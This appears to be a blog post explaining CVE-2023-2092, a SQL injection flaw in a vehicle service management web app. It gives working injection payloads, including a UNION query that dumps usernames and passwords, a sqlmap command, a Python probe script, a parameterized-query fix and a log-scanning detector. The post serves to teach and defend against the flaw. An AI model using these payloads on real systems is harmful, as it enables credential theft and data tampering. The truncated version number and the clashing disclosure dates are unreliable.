In May 2023, a critical security vulnerability was disclosed in SourceCodester Vehicle Service Management System 1., a popular open-source project. The issue, tracked as CVE-2023-2092 and recorded in VulDB as VDB-226100, allows remote attackers to perform SQL injection. The vulnerable file is view_service.php, which mishandles the id parameter.

In this post, we’ll walk through what SQL injection is, how this particular exploit works, show PoC code, and talk about how you can detect and fix the issue.

What Is the Vulnerability?

The problem boils down to missing sanitization of user input passed via the id parameter in view_service.php. When the application builds its SQL query, it interpolates the user-supplied value directly into the query string without validation, escaping, or parameter binding. Anyone who can reach the application can therefore send crafted values that change the query: reading data they should not see, tampering with records, or deleting information.

In simple terms: instead of just showing a service record, a bad actor could force the system to run extra SQL commands.

- Version: 1. (and likely earlier, unless patched)
- File: /view_service.php
- Input parameter: id
- CVE: CVE-2023-2092
- VulDB: VDB-226100

When a user visits a page like this:

http://yourserver/view_service.php?id=11

the backend takes 11 and likely runs a SQL query such as:

$id = $_GET["id"];
$query = "SELECT * FROM services WHERE id = $id";
$result = mysqli_query($conn, $query);

Because $id is NOT sanitized or escaped, you can control the query by changing the id value.

Let’s say you want to see if the application is vulnerable. You might try:

http://yourserver/view_service.php?id=1 OR 1=1

which builds the SQL:

SELECT * FROM services WHERE id = 1 OR 1=1

Now, instead of showing just one service, it'll show ALL services! But it gets worse.

Suppose you want to dump another table:

http://yourserver/view_service.php?id=1 UNION SELECT 1, username, password FROM users--

Assuming you know the columns and their order, you could expose usernames and passwords.

Let’s automate the check with sqlmap, a popular open-source SQL injection tool:

sqlmap -u "http://yourserver/view_service.php?id=1" --batch --dbs

If the parameter is injectable, this enumerates all available databases (--batch accepts sqlmap's default answers so it runs without prompting).

You can get sqlmap here:  
https://github.com/sqlmapproject/sqlmap

Here’s a quick Python script to check manually:

import requests

target_url = "http://yourserver/view_service.php"
payload = "1' OR '1'='1"

params = {"id": payload}

# A timeout keeps the script from hanging if the host does not answer.
response = requests.get(target_url, params=params, timeout=10)

# Crude heuristic: if the server did not reply with a SQL syntax error,
# the payload was accepted as part of the query.
if "syntax" not in response.text.lower():
    print("Vulnerable to SQL Injection!")
    print(response.text)
else:
    print("Likely patched or error happened.")

References

- NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-2092
- VulDB advisory: https://vuldb.com/?id.226100
- Exploit DB: https://www.exploit-db.com/exploits/51313
- sqlmap tool: https://github.com/sqlmapproject/sqlmap

How to Fix It

- Always sanitize inputs (use prepared statements or parameterized queries).
- Never trust data coming from GET/POST without checking.

Bad (vulnerable)

$id = $_GET["id"];
$query = "SELECT * FROM services WHERE id = $id";

Good (safe)

$stmt = $conn->prepare("SELECT * FROM services WHERE id = ?");
$stmt->bind_param("i", $_GET["id"]); // "i": bound as an integer, never spliced into the SQL text
$stmt->execute();
$result = $stmt->get_result();        // read rows from here instead of from mysqli_query()
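Beyond patching, you can look for abuse of this parameter in your web-server logs. The following Python script is an added defensive example (not part of the original post or the project's code): it parses access-log lines and flags every request to view_service.php whose id parameter, once decoded, is anything other than a plain integer. The log lines are constructed samples in Apache combined format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Apr/2023:10:15:01 +0000] "GET /view_service.php?id=11 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [15/Apr/2023:10:15:07 +0000] "GET /view_service.php?id=1%20OR%201%3D1 HTTP/1.1" 200 9712 "-" "Mozilla/5.0"
203.0.113.5 - - [15/Apr/2023:10:15:09 +0000] "GET /view_service.php?id=1+UNION+SELECT+1,username,password+FROM+users-- HTTP/1.1" 200 3110 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Apr/2023:10:16:00 +0000] "GET /view_service.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 9712 "-" "sqlmap/1.7"
198.51.100.9 - - [15/Apr/2023:10:16:30 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, ident, user, [timestamp], "METHOD path PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def is_suspicious_id(value):
    """view_service.php expects a numeric id; a decoded value that is not digits only is suspicious."""
    return re.fullmatch(r"\d+", value.strip()) is None

def scan_log(text):
    """Return one finding per request to view_service.php whose id parameter is not a plain integer."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("path"))
        if url.path != "/view_service.php":
            continue
        # parse_qs percent-decodes and turns '+' into spaces, so we see what the PHP side saw.
        for raw in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if is_suspicious_id(raw):
                findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                 "status": m.group("status"), "id": raw})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} id={f['id']!r}")
```

Run it against a real access log by passing the file contents to scan_log(); a 200 status on a flagged request is the case worth investigating first, since it means the application answered rather than erroring out.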

Final Thoughts

SQL injection remains one of the most dangerous and easy-to-exploit vulnerabilities in web applications. If you’re running SourceCodester Vehicle Service Management System 1., you MUST fix or isolate this system immediately. Attackers can exploit this bug remotely – it’s only a matter of time.

Check your application and code, patch up, and stay safe!

*If you found this post helpful, share it with your fellow developers & sysadmins to help improve security everywhere!*

Timeline

Published on: 04/15/2023 10:15:00 UTC
Last modified on: 04/24/2023 18:12:00 UTC